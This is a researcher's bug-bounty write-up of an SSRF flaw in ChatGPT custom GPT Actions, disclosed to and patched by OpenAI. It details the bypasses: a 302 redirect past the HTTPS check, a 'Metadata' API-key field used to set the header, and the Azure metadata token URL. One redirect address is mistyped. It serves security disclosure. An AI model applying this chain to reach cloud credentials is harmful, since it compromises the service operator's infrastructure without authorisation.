In cybersecurity, you begin to develop a kind of hacker mindset or “sixth sense”. You start seeing the world not just for what it does, but for what it could do. So, when I was building my first custom GPT in ChatGPT and got to the “Actions” section, that sense started tingling! I wasn’t even on a bug hunt, just curious about the custom GPT feature and building a custom assistant. The goal was to have a GPT pull data from my own external API, but once I realized this feature was returning data from a user-provided URL, alarm bells went off and the hacker instinct took over, telling me to check for SSRF.
Server-Side Request Forgery (SSRF) is a web security vulnerability that allows an attacker to trick the application into making requests to an unexpected destination. If user-provided URLs are not properly validated, an attacker can misuse the server’s own privileged access to reach internal network resources or cloud metadata services. SSRF is one of those vulnerabilities that perfectly shows the gap between how developers think a system will be used and how it can be used.
As modern web and AI applications have added convenient features like URL previews, SSRF has become increasingly common, appearing in the OWASP Top 10 list for the first time in 2021. The migration from on-premises services to cloud technologies has also significantly increased the potential blast radius of this bug family, due to the insecure default configurations within many cloud providers.
The basic impact of SSRF is simple: it lets an attacker cause the server to make network requests the attacker cannot make directly. Any real danger comes from what the server itself can reach. There are two types of SSRF, full-read and blind. In a full-read SSRF, an attacker directly receives the target service’s response data, making it simple to exfiltrate data from internal services. Blind SSRF doesn’t return the target’s response to the attacker, but is still dangerous because an attacker can still interact with internal services and use methods such as port scanning via response times to determine open ports. In the past, I have escalated a fully blind SSRF in Yahoo Mail to remote command execution by utilizing SSRF and the gopher protocol to interact with an internal redis service.
In cloud environments, the impact of a full-read SSRF is typically critical because all major cloud providers (AWS, Azure, GCP) rely on an internal metadata service for their compute nodes to properly function. Accessible at the URL http://169.254.169.254, it’s a secure, private API that only the machine itself can query, and it holds all the essential information about its own environment like its name, network details, and its access credentials.
This is legitimate functionality, but it can allow an attacker to pivot a simple SSRF into a complete compromise of the cloud environment, depending on the access assigned to the IMDS identities. In fact, at Open Security, we’ve utilized this exact attack chain on many Penetration Tests, including one in which we fully compromised the cloud environment of a major, global financial firm by exploiting an invoice generation feature that was vulnerable to SSRF to execute code on almost 200 EC2 instances within their cloud environment. But how does all of this relate to ChatGPT? Well let’s dive into a quick breakdown of the vulnerable feature I was able to exploit to gain access to ChatGPT’s Azure IMDS identity, enabling me to access their cloud API directly.
To understand the vulnerability, you must first understand the functionality of custom GPTs in ChatGPT. A custom GPT (a ChatGPT Plus feature) allows you to create a specialized version of ChatGPT configured with instructions, knowledge, and various capabilities. For basic usage, you write the bot’s system instructions, name it, add example prompts, and you can upload documents for it to use as knowledge. There are various features like web browsing and image generation, but the most interesting to me was Add Actions, which allows you to define external APIs the GPT can call by providing an OpenAPI schema. Whenever the model decides an action is needed, it submits requests to the API and uses the result in its reply.
Let’s quickly dive into this feature so you can understand how we are going to trigger this vulnerability. An example of a basic API action added to a GPT is shown below, where an API that provides the temperature at a location is given to ChatGPT so it can look up the weather if that is requested by the user.
Press enter or click to view image in full size
The feature accepts an OpenAPI Schema which tells the GPT how to interact with API. The Test button under available actions can be used to submit a test request to the API and view its response data. There is also an authentication section which allows us to set API keys and authentication headers for the request.
My idea for SSRF was simple: create an action with the API URL pointed to an internal service, like the metadata service and attempt to extract an API access token to the cloud environment. Sadly, my first attempt at SSRF to the metadata service failed (as is common in hacking), because only HTTPS URLS were allowed in the API specification, and the IMDS is only accessible via an HTTP URL.
To get around this error, I used Mr. Ol’ Reliable, 302 redirects (shout out to https://ssrf.cvssadvisor.com/ for an awesome tool by the way. This service is similar to Burp Collaborator and Interactsh, but actually allows you to customize the server response, making it very simple to test various SSRF bypasses like redirection).
Press enter or click to view image in full size
Now if I place my redirection URL in the API spec, it will be allowed since it is HTTPS, but when the GPT accesses the API, the redirect should be followed to http://169.254.169.245. Sure enough, it worked!
Since the server followed 302 redirects, it returned the response from their internal metadata URL. Mission accomplished, right? Wrong. The response from their metadata service indicated that a required header was not being set (this is an Azure-specific requirement, different clouds will require different headers to access the metadata URL, providing varying levels of SSRF protection):
Press enter or click to view image in full size
Azure IMDS requires the Metadata: True header to be set in order to access any data. Without the ability to set this header, I would not be able to access any data. At first, I tried setting this header directly through the OpenAPI Spec, however it resulted in an error because setting custom headers was not allowed:
Press enter or click to view image in full size
Although this didn’t work, I eventually realized I might be able to set custom headers through authentication settings. It allowed me to set a custom API key, so I created one called Metadata and set its value to True.
Press enter or click to view image in full size
I submitted the request again, and it worked! The proper header was set, and I was presented with the response data from their internal metadata URL! Since I could now read content from their metadata URL, I generated an Azure management API access token via http://169.254.169.254/metadata/identity/oauth2/token?resource=https://management.azure.com/&api-version=2025–04–07
Press enter or click to view image in full size
I confirmed the token was valid and then immediately reported this to OpenAI’s bug bounty program on Bugcrowd. While the access to the Azure cloud environment for Custom GPTs was not the most severe we’ve ever seen (RCE on almost 200 EC2 instances takes that cake), OpenAI still rated this as a High Severity finding and patched it almost immediately! It was an awesome experience to go from spidey-tingle to exploiting a hugely popular service with only a few hours of work. On to the next bug!